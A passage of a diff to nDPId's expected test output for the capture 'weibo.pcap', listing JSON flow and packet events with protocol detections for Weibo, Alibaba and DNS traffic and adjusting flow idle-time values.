-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8i2VAAEAGsnbAqAFpjM2uAbzhAbvMrYF4AAAAAKACchDB7gAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8pN1AAEAG2SPAqAFp3kkcYKUoAFA4Ca70AAAAAKACchCCVAAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8GyhAAEAG7ETAqAFpL1lB5caPAbufLBEBAAAAAKACchAfvgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1463089073760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1463089073760,"pkt":"eJKcD6iOkDVu60UQCABFAACPAABAAEARtqPAqAEBwKgBaQA1xdAAe7w5O9aBgAABAAMAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAHADAAFAAEAAAJYAAcEYWNqc8ATwC8ABQABAAABAAAhBGFjanMGYWxpeXVuA2NvbQNnZHMKYWxpYmFiYWRuc8AawEIAAQABAAAAbAAEKpy4Ew=="} 00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1463089073763,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1463089073763,"pkt":"eJKcD6iOkDVu60UQCABFAACYAABAAEARtprAqAEBwKgBaQA1hB4AhOXUkPeBgAABAAMAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAcAMAAUAAQAAASwADAl3YWdicmlkZ2XAEsAuAAUAAQAAAMgAJgl3YWdicmlkZ2UGdGFvYmFvA2NvbQNnZHMKYWxpYmFiYWRuc8AZwEYAAQABAAAALwAEjM2qPw=="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073789,"pkt":"kDVu60UQeJKcD6iOCABFAAA8F+ZAAEAGKbjAqAFpjM2qP7prAbvY7h2OAAAAAKACchAfhQAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} 